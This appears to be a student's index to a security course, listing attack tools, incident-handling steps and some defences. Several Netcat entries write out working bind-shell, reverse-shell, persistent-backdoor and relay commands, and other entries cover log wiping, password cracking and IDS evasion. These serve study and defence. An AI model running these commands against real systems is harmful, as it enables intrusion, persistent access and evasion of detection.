Hydan: How Hides Info 5 146, 147 **Uses add or subtract functions
IT dynamically rebuilds the executable from the ground up, making substitutions of adds and subtracts to hide necessary
bits. The resulting executable's size is the same because ADD and SUB are the same size

Guesses passwords
Dictionary support
Hydra 4 8 Supports a variety of Protocols
RDP finally added
--Runs on Linux and UNIX
iastor.sys 5 77 driver modified by Alureon
ICMPCmd 5 128 Windows shell tool using ICMP
ICMPShell 5 128 Linux shell tool

Identification - Additional
1 95 What level of skill and prerequisites are required by an attacker to exploit the vulnerability? Is a fix available? Do other
Assessment Questions
factors exist that reduce or increase the vulnerability risk or potential impact?

How widely deployed is the system?

What is the value of the system/data?
What is the potential impact?
Identification -
1 94 Can this be exploited remotely?
Assessment
Is there a public exploit
--verify via CVE, bugtraq or ISC
**Must carefully review all facts and provide an initial assessment
--determine incident vs event
Assign a person to be the primary incident handler
Identification - Assigning -Select a person to handle identification and assessment
1 50 -Assign specific set of events and systems to analyze
Handlers
**Very helpful to support sysadmins to handle little problems and provide them a means to escalate as needed.
 Keywords Book Page Remarks
Enforce a "need to know" policy
Identification - Control -may be required to testify, maintain integrity of investigation by keeping it within official channels and limiting potential
1 51 witness pool
information flow
**early disclosure may inform the culprit or embarrass the org.
Be willing to alert early!
Identification - Points to Provide indications and warning
1 49 Provide current "intelligence"(up to date information) to incident handler
keep in Mind
Fuse or correlate information
Network perimeter
Identification - Where Host perimeter
does Identification 1 53 System-level (host)
Occur? Application-level
Identification Across All
1 59
Levels You want identification capabilities at all four levels: Network perimeter, host perimeter, host level, and application level
Rely on out-of-band communications
-Use telephones and faxes
Identification - --VoIP can be sniffed and played back using a variety of tools (Wireshark, Cain, VOMIT) if it is not encrypted
Communications 1 52 Plan for encryption that might be needed (GnuPG, PGP, S/MIME)
Channels -Share keys in advance
Possibly encrypted cloud storage, such as Tresorit or SecureSafe

maintain a provable chain of custody

--Do NOT delete ANY files until the case is closed
--Identify every piece of evidence in your notebook
--Control access to evidence
Identification- Establish Each piece of evidence must be under the control of one identified person at all times
1 96
Chain of Custody -Include an access log; record who and when
Record when you lock it up in storage
**When turning over evidence to law enforcement, have them sign for it
--only give LE copies unless absolutely required

Gathering intelligence on system activity

- What web sites and FTP sites are being visited?
Identification of Insider -Hacking tools, encryption tools, stego software, free web-based e-mail sites
1 174 Monitor message boards for posted financial or merger information
Activity (Insider Threat)
Gather intelligence on your employee's activities
- targeting a particular employee requires written HR approval

Idle scans 2 94 This scan type can be used to divert attention, obscuring the attackers location on the network
IDS/IPS Evasion -
2 112
Blending In The goal is to use a protocol which is normal, many times with a valid user ID and password for the target environment
Reassemble packets streams before making filtering or intrusion-detection decisions.
IDS/IPS Evasion- -Try to mirror the OS as closely as possible.
2 113
Defense Keep you IDS and IPS up to date
-ensure IDS/IPS has adequate resources to maintain throughput
IE SSL Warning
3 62
Message See screenshots
ifconfig wlan0 hw ether
2 72
[MACaddr] Linux command used to change MAC address
 Keywords Book Page Remarks
imageinfo 5 23 Shows the date and time the memory dump was captured
Implement appropriate protection techniques
- Applying firewall and/or router filters
Improving Defenses - Moving the system to a new name/IP Address
1 119 - Null routing particular IP address
(Eradication)
- Changing DNS names
- Applying patches and hardening the system

Inappropriate Web Only investigate individual use if HR requests such action in writing
Access (Unauthorized 1 168
Use)

Inception 3 4 Unlocking a powered on and locked computer via DMA firewire/Thunderbolt connections, great for gaining access to
systems with hard drive encryption.
Refers to an adverse event in an information system and/or network-
Incident 1 11
**** Incident implies harm or the attemplt to harm.
Is an action plan for dealing with the misuse of computer systems and networks
Incident Handling 1 10 --Keep written procedures and policy in place
--It also cover insider crime and intentional and unintentional events that cause loss of availability
Incident Handling for
Intellectual Property 1 181
Cases Prep: Survey your Intellectual Property, ID: Look for Leaks, Containment: Criminal or Civil case, Lessons Learned -NA
Incident Handling Preparation-Identification-Containment-Eradication-Recovery-Lessons Learned
1 17
Phases
inetd 2 105 *nix service initialization script

Ingress and Egress Data

1 132 Need to start somewhere. Connection data from the various points of presence is a good start. 1.Web Proxy, 2.DNS
(Enterprise -wide IR)
Cache, 3.Connection Logs
Initial Identification Determine whether an event is actually an incident. Check for simple mistakes. Assess the evidence in detail. Maintain
1 93
Assessment situational awareness, reporting to the chief.
Simply stated, a threat from an entity with access to your data
- An employee (including contract and temp employees
Insider threat 1 172 - A business partner (someone that has legitimate access, but is not an employee)
- Such attackers usually have valid credentials and knowledge of the environment and its business practices
With written approval from HR, you can monitor an individuals suspect's activity:
-Identify equipment being used
-Identify the operating system being used
-Identify the suspect's IP address
-Begin monitoring HTTP activity
Insider Threat Checklist -Monitor the IP address using IDS tools
1 175 - 176
(Insider Threat) -Monitor e-mail
Monitor phone numbers called
Confirm background check data
Perform an after-hours visit
 Keywords Book Page Remarks
Review the data from the machine
Summarize you findings
- What does it all add up too?
Interview the insider, if required
Insider Threat -Very important: Make no promises
1 177
Checklist(3) -What is the suspect's version?
-Why was it done?
-How long has it been going on?
-What is the damage?

InSSIDER 2 61 Noisy, sends out SSID-less probe requests and listen for probe responses, therefore, cannot detect Aps that don't respond
to such requests
InstallUtil.exe
logfile=/LogToConsole=f 3 153 see screenshots
alse /U exeshell.exe

By pulling down InstallUtil-ShellCode.cs and inserting msvenom (-f csharp) into it

InstallUtil-ShellCode.cs 3 152 Compile with the csc.exe tool
--Effective because it does not need a full Visual Studio Environment
Walkthrough here
We can compile these .exe files with the csc.exe utility, which is great for lightweight compilation on Windows systsms
Intellectual Property is the primary distinction between two competitors
- will come under continuous attack
Intellectual Property 1 179 -patents, copyrights, trademakrs, trade secrets
Apply standard IH procedures, but tailor to sensitive data
-ID and prepare defense/reaction for this material

enum -S [TargetIPaddr] pulls a list of shares (IPC$, ADMIN$, and CS$)

Interrogating Targets via enum -U pulls list of users
SMB Sessions 2 136 enum -G pulls groups and membership
(SMB Enumeration) enum -P pulls password policy information
Enum uses a NULL SMB session
Use -u [User Name] -p [Password] for authenticated session in Enum
inurl:"ViewerFrame?
2 42 shows numerous Panasonic cameras around the world, some of which allow you to control zoom, tilt, and pan
Mode="
Invalid TCP Checksum Many IDS/IPS sytems do not validate TCP checksum. An attacker can insert TCP Reset with an invalid checksum to clear
2 111
Bypass IDS/IPS buffer. Target systems drop any packet with an invalid TCP checksum
Invisible Secrets 5 143 Hides data in banner ads that appear on websites
Iterates through a series of IPv6 addresses scanning for target systems and ports, invoked with the "-6" syntax. Today all
IPv6 scanning 2 94 Nmap scan types support a -6 option. In older, versions of Nmap, IPv6 scans were limited to ping sweeps to identify host
addresses in use. TCP connect scans, and version scans only
For external attacks, coordinate closely with your Internet service provider
ISP Coordination - It may be able to assis you in identification, containment, and recovery
1 108
(Containment) *Especially for large packet floods, bot nets, worms and virulent spam
 Keywords Book Page Remarks

ISR-Evilgrade tool
--Listens for software to request update
ISR-Evilgrade tool 2 12 --Sends response with malware
--Currently includes modules for Java browser plug-ins, Winzip, WinAmp, MacOS X, OpenOffice, iTunes, LinkIn toolbar,
and more
--More than 60 software packages in total whose Internet updates can be subverted this way
Jikto 4 112 Jikto: performs a Nikto scan of internal websites using XSS
Jikto 2 111 performs a Nikto scan of internal websites using XSS functionality
John the Ripper 4 35 A very powerful and fast password cracking tool. Runs on UNIX, Linux, and Windows of all kinds

You must feed it an encrypted password file:

-On UNIX can feed it passwd or shadow file
-If you unshadow before running, John can compute initial guesses from the GECOS field, speeds up cracking.
-For windows passwords, just give john the text-based output from pwdump3 or fgdump
35
John the Ripper 4 Single Crack Mode:
38 -
-Uses variations of account name, GECOS, and more
-Wordlist Mode: Uses dictionary and hybrid
Incremental Mode: Uses Brute Force guessing
External Mode: Uses an external program to generate guesses

-DES, eDES, MD5, Blowfish, LANMAN, NT, NTLMv1,

Guard the password file!

--Carefully protect backups
John the Ripper: --Physically protect system build media
4 40 Enforce strong passwords:
Defenses (Preparation)
--With (PAM) or related tool
Use shadow passwords
Use Crypto-based and token-based authentication

Single Crack Mode:

--Uses variations of account name, GECOS, and more
Wordlist Mode:
John's Cracking Modes 4 38 --Uses dictionary and hybrid
Incremental Mode:
--Use brute force guessing
External Mode:
--Uses an external program to generate guesses
John supports and autodetects the following formats: Standard and double-length DES, BSDI's extended DES, FreeBSD's
John's Input and Output 4 39 MD5, Open BSD's Blowfish, and Windows LANMAN
(Cracked passwords are stored in john.pot file, remove file when finish with password audit
Jskeylogger 3 54 MitMf has a module that allows us to grab keystrokes by injecting code into viewed webpages
Jsteg 5 143 Hides in jpeg images using the DCT coefficients

Jump Bag - Additional Call list and phone book, cell phone w/ extra batteries, Anti-static plastic baggies w/ ties for storing evidence. Baggies w/
1 46 white embossed squares let you write content notes on the bag. Desiccants for handling moisture in bags. Extra notebooks,
Helpful Items
Additional copies of all incident forms. Change of clothes, deodorant, aspirin, antacid.
 Keywords Book Page Remarks

Jump Bag - Additional

1 42 Diagnosis software you can trust. Statically linked binary executables from a write-once media (CD or USB). It is not advise
Software
to use bootable Windows PE environments. Instead, use a good bootable Linux environment, such as SIFT.
Small jumpers(to alter a hard drive from master to slave), Flashlight, Screwdrivers, Female-to-Female RJ-45 connector,
Jump Bag - Final Items 1 47 Extra pens, Tweezers, Mechanics' mirors for looking around corners, Telescoping "hands" for grabbing small items,
Business cards.
USB Token (at least 8GB), External Hard drives with USB2 and USB 3 interface and possible Firewire and/or Thunderbolt
Jump Bag - Hardware 1 44 (2TB). Ethernet TAP(4 to 8 ports preferable), Patch Cables (at least 2 straight-through, and 1 crossover), USB cables and
serial cables.

Jump Bag - Investigative One of the best freely available Linux enviroments for investigations, incident handling, and digital forensics. This Vmware
1 43 appliance includes hundreds of tools to examine data. Includes a Sleuth kit, PTK, Autopsy GUI, Wireshark, MD5deep, and
Tools (SIFT)
Volatility suite.

Jump Bag - More

1 45 Laptop w/ multiple operating systems. Use operating system you have most experience in. VM's(Vmware,Virtual Box, or
Hardware
Virtual PC). Large hard drive (at least 1.5TB, but more if you can afford it), Lots of RAM (at least 32GB), Solid State Drives.
Binary image-creation software: dd, Netcat, and ncat, Safeback, etc.
Jump Bag - Software Forensic software: Sleuth Kit, Autopsy, EnCase, Forensics Toolkit, X-Ways Forensics, SIFT
1 41 hardware: laptop, tap, hub, cabling, write-blocker
Preparation
**bring your own trusted libraries, rootkits can trick your tools!!
Kansa in Action
1 141-143
(Enterprise-Wide IR) Kansa Running and Kansa Things to Look for
Kansa requires Powershell 3.0
Kansa Setup (Enterprise- --install Handle.exe / autorunssc.exe from Sysinternals
1 140 --machine launching the scripts, install Logparser from Remote Management: C:\>winrm quickconfig
wide IR)
-Add all hosts you want checked into a text file and loaded in the Kansa-Master Directory

listens on a wireless interface for probe requests

Karmetasploit 2 69, 70, 71 --pretends to be sought after wireless access point
serves up exploits for vulnerable clients when they try ro connect
--offers various services: DHCP, DNS, POP3, HTTP, Samba
The kernel controls interactions between user programs and hardware
Kernel 5 57 User mode and kernel mode setting in hardware (Ring 3 and Ring 0 on x86)
User programs make calls into the system call table
-points to kernel code for implementing the system call

In general, there are (currently) four different methods for manipulating the kernel being publicly discussed
1) Loadable kernel modules (UNIX) and devices drivers (Windows)
Kernel-Mode Rootkit 2) Altering kernel in memory
5 60
Technique: Types 3) Changing kernel file on hard drive
4) Virtualizing the system
Each available on Linux and Windows (he said 5 methods)
kill running process on *nix systems
kill / killall 2 105 kill [pid]
killall [process_name]

Kismet 2 63 passive WAP discovery, can also detect Zigbee w/ right hardware
Kiwi's syslog 5 121 Third party tool for syslog for windows
 Keywords Book Page Remarks
koders.com 3 107 code search engine
Kon-boot 3 4 USB boot attack where any password is accepted as a correct password.
Stop storing LANMAN hashes in reg key:
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
-On the Edit menu, click Add Key, type NoLMHash, and click ok
LANMAN - Disabling Stop sending LANMAN Challenge/Response across the network:
4 32
Authentication*** LMCompatibilityLevel registry parameter
-Level 3- Send NTLMv2 authentication only- good for clients
-Level 5-Domain Controllers accepts only NTLMv2

By default, both LANMAN and NT Hashes are stored on Windows NT/2000/XP/2003

--On Windows 2000/XP/2003, passwords of 14 characters or less are hashed
--Pad to exactly 14 characters
LANMAN Hashes 4 16, 17, 18 --Convert to all uppercase characters
--Split the 14 characters into two 7-character strings
--Use each 7-byte string as a DES key
** No salt, very weak

Brute force attack on LANMAN hashes using single top of the line PC with quad processors (approximate times)
-Alpha numeric characters < 2 hours
LANMAN Hashes - 16 - -Alpha numeric-some symbols < 10 hours
4
Cracking 18 -Alpha numeric-all symbols < 120 hours
So no matter what the password is ( as long as it doesn't have [alt] characters), the LANMAN hash can be cracked within 5
days

Brute force attack on LANMAN hashes using single top of the line PC with quad processors (approximate times)
-Alpha numeric characters < 2 hours
LANMAN Hashes - 16 - -Alpha numeric-some symbols < 10 hours
4
Cracking (Cain) 18 -Alpha numeric-all symbols < 120 hours
So no matter what the password is ( as long as it doesn't have [alt] characters), the LANMAN hash can be cracked within 5
days
Lanturtle + Responder 3 4 USB attack where a malicious USB Ethernet adapter causes a system to generate DNS request and Responder can
capture hashes
lastlog -Accounting lastlog: File shows login name, port, and last login time for each user
5 84
Entries in UNIX -Default location on Linux: /var/log/lastlog
Least Significant Bit 5 149 reference
within two weeks of resuming production
Lessons Learned - -Review the report
1 128 -Finalize Executive Summary
Meeting
-Keep it short and professional,(maximum length= half day), don't start blaming
Linux Building Tools 1 239-242 Building tools to use (i.e. tar, configure, make)
Linux Cheat Sheet 1 251-261
Linux cheat sheet to assist with Unusual Process, Services,Files,Network usuage, scheduled task,log entries, accounts, etc
Linux Cheat Sheet
(Additonal Supporting 1 262
Tools Chkrootkit, Tripwire, AIDE, CIS Hardening Guidelines
Linux CMD's (whoami, Get more detailed information about your current user id and privileges
1 215
id, sudo su-)
 Keywords Book Page Remarks
Linux File System
1 218 - 225
navigation Detailed description on navigating the files ( i.e. cd, ls, pwd, mkdir, locate, find, cat, head, tail, tar)
Linux File System
1 217
Structure Detailed description of what is contained in each Linux File System (i.e., /root, /dev, /etc, /lib, /tmp, /var)
Linux for Hacker's
1 210-215
Workshop Basic Linux Commands to assist you with your Hacker's toolkit
Linux Network Set-up 1 233-238 basic network commands in Linux (i.e., service networking restart, ifconfig, ping, netstat)
Linux other odds-and
1 246-249
Ends commands Other useful commands to know in Linux (i.e. grep, man, info, shutdown)
Linux Running Programs 1 226-232
description on running programs (i.e $PATH, which ls, ps aux, bg, top, jobs
The Metasploit Meterpreter also includes a log wiping utility
Log Editing: Meterpreter --clearev command
5 111 --Clears all events from the Applicatio, System, and Security logs
Log File Alternations
----No option to specify a partcular type of log or event to wipe
Currently it clears the event logs completely, but could be expanded in the future to line-by-line event log editing

Preparation:
--Use a separate server for logging
----In UNIX, syslog to a separate server
----Windows also supports syslog, through the use of third-party tools
Use Behavioral Analytics
Log Editing: Defenses Microsoft Advance Threat Analytics
from Covering Tracks on 5 112,113 Rapid7 User Behavioral Analytics
Systems Exabeam
Preparation (continued)
--Cryptographic integrity checks of log files
Identification
--Look for gaps in logs
--Look for corrupt logs
--Look for odd user behavior
Cont, Erad, Recov: N/A

With physical access, an attacker could boot to Linix and edit the Windows logs directly with specialized tool
Log Editing: Editing Logs A Linux boot disk for editing the Windows password database (SAM) can be found at http://pogostick.net/~pnh/ntpasswd
5 110 --Be careful when using this on a machine with EFS on Windows XP and 2003
w/Physical Access
--You will likely lose the EFS keys if you change the password on them
This program cannot be used to edit logs

Loki 5 128 reference

Long Tail Analysis Enterprise Wide IR Powershell
1 139
(Kansa)
 Keywords Book Page Remarks
Long-term recovery involves continuous monitoring for re-infection or artifacts; script this process is possible
Windows reg command; look for unusual processes
Looking for Artifacts Windows wmic or tasklist commands, or Linux ps command
1 125 - Look for accounts used by the attacker
(Recovery)
Windows wmic user account or net user commands, or Linux cat /etc/passwd
- Look for simultaneous logins, or new accounts popping up

Low Orbit Ion Cannon 4 161 TCP connection floods, UDP floods, or HTTP floods (most common)
--allows attackers/volunteers to coordinate floods via IRC
Manipulate MAC to Physical plug mapping
Macof 3 48 - Flood switch with traffic with lots of bogus MAC Addresses, fill up the MAC table
On some switches when you fill up the MAC table, the switch begins to act like a hub because it cannot remember new
MACs

breaks long lines into smaller lines

str = str + "STUF"
Macro_safe.py 3 147 Less likely to generate errors
Get it here: https://github.com/khrox4osh/macro_safe.py

Converts the .bin file created by Veil into a macro that can be imported into a spreadsheet.
mailsnarf 3 51 Save e-mail captured from SMTP and POP to local host
gathers open-source intel on a target
Maltego 2 46 -can be used to find information about a phone #, IP addr, etc.
Defense: do a delf-recon and correct inaccurate info.

Starting points to find data on a target

Examples:
--DomainToPhone_Whois
Maltego Transforms 2 47 --DomainToMXrecord_DNS
--DomainToPerson_PGP
--IPAddrToPhone_Whois
--PersonToPerson_PGP
--EmailAddressToEmailAddr

Preparation:
--Ensure that publicly available information about your organization s accurate
Maltego: Defense 2 48 ----Keep records up to date
--Conduct your own recon

Ident, Cont, Erad, Recov: N/A

Application-Level
Malware Layers 5 7 User-mode Rootkit
Kernel-Mode Rootkit
 Keywords Book Page Remarks

Allow for the complete control of a victim system remotely accross the network
Client-server architecture
Malware: Application- Very popular and many examples:
Level Trojan: Backdoor 5 9 - Poison Ivy, VNC, Dameware (commercial), Sub7, BlackShades, GhostRAT
Suites - Many common backdoors can self-install upon system exploit
- Payload option in Metasploit
Attackers can trick victim into running tool
Most of these tools can be discovered with an antivirus tool.
Mandiant Redline (Labs) 1 147-156
Mandiant Redline is an outstanding tool for memory analysis
Man-in-the-Middle Supports ARP cache poisoning and multipe other injection/TCP stream modification attacks. Has the ability to manipulate
3 51
Framework (MitMf) TCP data on the fly
Masscan 2 98 separates out the SYNs and the SYN/ACKs, makes scan faster
MD5 Crack Project 4 22 Looks up word based on unsalted md5 hash and store them into memory
Another similar project focuses on creating MD5 hashes and loading them into memory
md5sum 2 13 built in Linux integrity tool
md5summer 2 13 file integrity checker, Windows

Used by investigators to analyze memory dumps from Windows machines to determine attacker's actions, such as
executing malicious application-level Trojan Horse backdoors.
A memory dump:
--Can be generated using a variety of utilities, including Mandiants Memoryze MemoryDD.bat, HBGary's fastdump,
Matthieu Suiches win32dd, winpmem, and ManTechs mdd
Memory Analysis 5 22 Volatile Systems Volatility Framework
--Free, open source, very feature rich and useful
--A modular tool written in Python
Google's Rekall
--Free
Create a memory dump with:
-Memoryze MemoryDD.bat, fastdump, win32dd, winpmem, mdd
Volatility Framework, Google's Rekall

MitMf can insert malicious .hta files into the stream

- This will be done with a fake update notification, prompting the user to run the .hta application
- This module is called HTA Drive-By
Messing w/TCP Layer 3 53 MitMf can also backdoor executable files it sees in transit
- This is called FilePwn
Bettercap also has plugins for arbitrary TCP modification
-Simple plugin architecture and a full tcp proxy
Beyond changing their appearance, these worms will change their entire functionality
Will contain encrypted/obfuscated payloads
Metamorphic Worms 4 66 After event occurs (time duration, infection rate, or other trigger), the worm morphs by decoding the hidden functionality

Runs on Windows, Linux BSD and MacOS X

A modular tool tying together
Metasploit Framework: - Exploit, payload and targeting (dest IP addr, port, options)
3 116
Packaging Exploits - Exploit and payload development packages
- Other computer attacks, including scanning and evasion tactics
 Keywords Book Page Remarks
-Multisession support for multiple targets
-In-memory process migration
-Disabling keyboard and mouse input
-Keystroke logging from within the Meterpreter
Metasploit: Additional
3 123 -Sniffing from within the Meterpreter
Features
-Multiple encoders for exploit and payload for IDS evasion
-Pivoting to use one compromised system to attack other machines
Priv module for altering all NTFS timestamps and dumping SAM database for cracking

Metasploit divides the concept of exploits, payloads, auxiliary, and post modules
- An exploit takes advantage of a flaw in a target system
- The payload makes the target do something the attacker wants
Metasploit: Arsenal 3 117 - Auxiliary modules perform all kinds of tasks, including scanning
- A post module is used in post-exploitation tp plunder targets or manipulate them
**new functionality added all the time
--useful for all OS, browers, apps, etc.

Benefts of using the Metasploit Framework for development

--Many features already built in simply development
Metasploit: Benefits 3 125 --More than a thousand example exploits to learn and copy from
--After an exploit is developed in the framework, it can use any payload already in the framework
--If you develop in the framework, your exploit can be popped right into the Metasploit engine
Includes routines used by exploit developers
--Payloads
--Various encoders/decoders for polymorphic code
Metasploit: Development 3 124 --Randomized NOP generator
--Wrapper for shellcode generationx
Slower development with the advent of bug bounties.

Many payloads to choose from

-Bind shell to current port
-Bind shell to arbitrary port
-Reverse shell back to attacker (shoveling shell)
-Windows VNC Server DLL Inject
-Inject DLL into running application
Metasploit: Payload 3 120 -Create Local Admin user
All payloads can be exported in many different formats
-Macros
-Executable (Windows, Linux, and Mobile devices)
-Web components
-Raw C, Perl, and Ruby code

Console, command line, and GUI Interface

Select exploit
- Some exploits include functions to check if the target is vulnerable
Metasploit: User Set target
3 118
Interface Select payload
- If no payload, attacker can set a command to execute
Set options and LAUNCH
 Keywords Book Page Remarks
General-purpose module giving ability to load and interact with DDLs in real time, after exploitation has occurred, and
interact across the network with the DLL
Meterpreter 3 121 Creates specialized command-line access within a running process
Windows, Linux, Java, and websites (PHP)

The Metasploit Meterpreter also includes a log wiping utility

Meterpreter Log File --clearev command
5 111 --Clears all events from the Applicatio, System, and Security logs
Alternations
----No option to specify a partcular type of log or event to wipe
Currently it clears the event logs completely, but could be expanded in the future to line-by-line event log editing
Meterpreter includes these features
- Displays system-related information (OS, user ID, and more)
- Interact with the file system
Meterpreter: Features 3 122 - interact with the network
- Interact with processes on the target
Meterpreter communications utilize TLS
- Encrypts them, which makes them more difficult to detect

Compromise a CA or RA and issue certs

Bleed the servers keys from memory
Dump system memory via malformed heartbear requests
PowerBleed
Methods for Dodging --Builds a bogus cert that has an MD5 hash collision with a trusted cert
3 65, 66, 67 Easier Methods include:
SSL Warnings
--Compromise browser and import attacker's cert as trusted
--Trick user into accepting cert through social engineering; email, pop-ups, or other means
--Sit in the middle and tell browser to use HTTP, not HTTPS (sslstrip tool does this)
--Attack sites that use SSL only for authentication with cleartext HTTP for the post-authenticated session
--Firesheep and droidsheep tools do this

Microsoft Enhanced Helps analyze vulnerabilities in third-party software

Mitigation Experience 3 126
Toolkit (EMET)
mimikatz 4 52 Mimikatz is an outstanding tool for extracting clear-text passwords from memory. Can be used with Rubber Duckie
mknod backpipe p
mknod 3 23, 24, 25
$ /bin/bash 0<backpipe | nc -l -p 8080 1>backpipe
modules 5 23 Lists loaded modules from the dump, including drivers and SYS files

Monitor the System Once system is back online, continue to monitor for backdoors that escaped detection. Utilize network and host-based
1 124 intrusion detection systems and IPS. Carefully check operating system and application logs. If possible, create custom
(Recovery)
signature to trigger on original attack vector because attacker will likely try same thing again.
 Keywords Book Page Remarks

Launch packet floods (SYN, HTTP, UDP, etc.)

Create HTTP proxy (useful for anonymous surfing)
Harvest email addresses
Load a plug-in into the bot
More Bot Functionality 4 74
Shut the computer down
Delete bot
Some versions even look for virtualization
Some bots can start a GRE (Generic Route Encapsulation) Redirector, so an attacker can send IP packets across a GRE
Tunnel to an infected system
MP3Stego 5 143 Hides in mpeg files
msfelfscan 3 124 Metasploit module for finding overflow flaws in code
msfpescan 3 124 Metasploit module for finding overflow flaws in code
Msgsnarf 3 51 Captures all messages sent via AOL Instant Messenger, ICQ 2000, IRC, MSN Messenger, or Yahoo Messenger chat
sessions
Many attackers today are still very focused on 32-bit payloads
MSVenom 3 142 AV vendors are getting pretty good at detecting 32-bit payloads
64-bit options in Metasploit offer a large number of evasion opportunities
Lets look at -f exe-only

Multi-Exploit Worms 4 58 A worm uses its exploit warhead to penetrate a computer. Worms becoming more complex, use several exploits at once
If you've patched against N-1 vulnerabilities, the worm will still get in through the hole N
Multiplatform Worms 4 59 Worms that are able to attack many OS types, all rolled into a single worm

On Windows systems there are also a couple of protocols computers will use to resolve names of other systems:
- DNS, Link-Local Multicast Name Resolution (LLMNR), and NetBIOS Name Service (NBT-NS)
Failing DNS, systems will query local systems for a name using LLMNR, failing that, they will use NBT-NS
Name Resolution 3 50 Every bit as bad as it sounds
Kind of like asking friends for bad directions
The danger is when a name is not resolvable by DNS
- Think mistyped domains and hostnames
Nasty payload (Worms) 4 65 In the future, worms will have truly nasty purpose like gradually destroy host systems, Search hard drive and steal sensitive
data
Look at NetBIOS over TCP/IP activity
nbtstat 1 65
C:\> nbtstat -S

Nessus 2 117 A very useful tool. A client-server architecture with a large number of plug-ins that measure targets for individual
vulnerabilities.
Nessus Architecture 2 118 view slide

Web-App based Vuln scanner, runs an HTML5 server

Some plug-ins are characterized as "dangerous"
-May crash target system b/c they test actual attack
Nessus Platform Support 2 119 - "Safe Checks" is the GUI option that turns off dangerous plug-ins
*Defined API for plug-ins, can be written in C or NASL
Each plugin is responsible for a single attack, reports to nessusd server

Nessus Plug-Ins 2 120 One plug-in is in charge of doing one attack and reporting the result to the Nessus server (nessusd).There are over
100,000 plug-ins. Auto updated every 24 hours.
 Keywords Book Page Remarks
Look at who has an open session with the machine
net session 1 65
C:\> net session
net session 2 143 lab on page 162
Look at which sessions this machine has opened with other systems
net use 1 65
C:\> net use
net use 2 135 lab on page 162
Look at file shares and make sure each has a defined business purpose
net view 1 65
c:\> net view \\127.0.0.1

Netcat 3 11 Focus is on moving raw data between ports on systems

-ncat, gnu, dnscat, socat, cryptcat, linkcat

nc [options] [target system] [remote port(s)]

-l: Listen mode (default is client)
-L: Listen harder (Windows only); makes Netcat persistent listener
-u: UDP mode (default is TCP)
-p: Local port (in server mode, this is port listen on; in client mode, this s source port)
In some nc version -p means source port only
Netcat - Switches 3 14 nc -l -p 8080 (traditional nc) versus nc -l 8080 (gnu style nc)
-e Program to execute after connect (useful for backdoors)
-z: Zero I/O mode (useful for scanning)
-wN: timeout for connects, waits for N seconds (useful for scanning).
-v: Be verbose (print when connection is made)
Standard shell redirects
>: Dump output to a file
<: Dump input from a file
|: Pipe output of first program into second program
Get a login prompt (or other backdoor) at any port, TCP or UDP
UNIX: nc -l -p [port] -e /bin/bash
15 Windows: nc -l -p [port] -e cmd.exe
Netcat - Backdoors 3 Use Netcat in client mode to connect to backdoor listener:
21
nc [listenIP [port]
You are logged in as the user that ran Netcat

The batch file approach, which works well on Windows

- On Windows, create a file called ncrelay.bat containing "nc next_hop 54321
- To implement a relay, type nc-l -p 11111 -e ncrelay.bat
Netcat - Backpipe 3 19-21 - T -e option can be followed by only one argument, so use batch file
The backpipe approach, which works well on Linux and UNIX
$ mknod backpipe p
$ nc -l -p 11111 0<backpipe | nc next_hop 54321 1>backpipe

Netcat - Client Mode 3 12 --Messages from the tools itself are sent to standard err
Supports source routing, which in useful for spoofing
Netcat is faster than Telnet
Netcat - Connections 3 18 Easier to drop a connection with Netcat than with Telnet
Some binary data is interpreted as Telnet options characters: Netcat handles raw data well
Telnet doesn't support UDP, but Netcat does
 Keywords Book Page Remarks

Send files between machines

-You can even set use some browsers as the client for option 1
-Works with TCP or UDP
-You can even set up source IP address on listener so that it only accepts connections from one source address
- Similar functionality to a TCP wrapper
Netcat - Data Transfer 3 16
Option 1) To move a file from listener back to client
listener: nc -l -p [port] < [filename]
client: nc [listener_ip] [listener_port] > [filename]
Option 2) To push a file from client to listener
listener: nc -l -p [port] > [filename]
client: nc [listener_ip] [listener_port] < [filename]
Netcat - Listen Mode 3 13 - Clients initiate connections
- Listens wait for them to arrive

On Windows, Netcat re-starts listening when invoked with "-L"

On Linux/UNIX, Netcat can be made persistent in several ways
- Schedule a cron job to start Netcat regularly
Netcat - Persistent - Use a version of Netcat that supports "-L"
3 20
Backdoor Listeners - Use a while loop, as in
$ while [ 1 ]; do echo "started"; nc -l -p [port] -e /bin/bash; done
Put that into a shell script called listener.sh, chmod it to readable and executable, and use the nohup command to log out
and keep it going
$ nohup ./listener.sh &
Netcat can be configured to relay information from machine to machine to machine
- Redirect data through ports allowed firewalls
Netcat - Relays 3 22, 23 - Or use relays to make it harder to trace true originating point of an attack
- Rather trivial, but set up Netcat in listener mode and pipe its output through another client-mode instance of Netcat

You can even "push" session from client to listener

- This is sometimes called "shoveling shell"
Netcat - Reverse Shells 3 21 - listener: nc -l -p [port]
- client: nc [listenerIP] [port] -e /bin/sh
- Then, type commands at the listener
- The network thinks the connection is outgoing Telnet, HTTP, whatever...It's really an incoming interactive shell

TCP and UDP port scanning

Linear scans (default) or random scans (with the -f option)
nc -v -w3 -z [targetIP] [startport]-[endport]
Netcat - Scanning 3 17 -z: option for minimal data to be sent
-v: tells us when a connection is made; crucual item for a port scanner
-w3: means wait no more than 3 seconds on each port
-r: Linear scans (default) or random scans (with the -r option)
 Keywords Book Page Remarks

We discuss some of the many uses for Netcat

1) Data transfer (moving files)
Netcat - Uses 3 11 2) Port scanning and vulnerability scanning
3) Making connections to open ports
4) Backdoors
5)Relays
Netcat backdoor w/o -e 3 25 mknod backpipe p
$ /bin/bash 0<backpipe | nc -l -p 8080 1>backpipe

The defense against Netcat depends on the mode in which it is used:

Preparation step involves:
-Data transfer: Know what is running on your system
-Port scanner: Close all unused ports
Netcat Defenses 3 26 -Vulnerability scanner: Apply system patches
-Connecting to open ports: Close all unused ports
-Backdoors: Know what is running on your systems
-Relays: Carefully architect your network with layered security so an attacker cannot relay around your critical-filtering
capabilities.
Intranet firewalls can help create chokepoints for filtering
Private VLANs (PVLANs) can also help restrict the flow of traffic between systems

The batch file approach, which works well on Windows

- On Windows, create a file called ncrelay.bat containing "nc next_hop 54321
- To implement a relay, type nc-l -p 11111 -e ncrelay.bat
Netcat Relays - Methods 3 23, 24, 25 - T -e option can be followed by only one argument, so
The packpipe approach, which works well on Linux and UNIX
- mknod backpipe p
- nc -l p 1111 0<backpipe | nc next_hop 2222 1>backpipe

Get a login prompt (or other backdoor) at any port, TCP or UDP
UNIX: nc -l -p [port] -e /bin/bash
Netcat: Backdoors 3 19 Windows: nc -l -p [port] -e cmd.exe
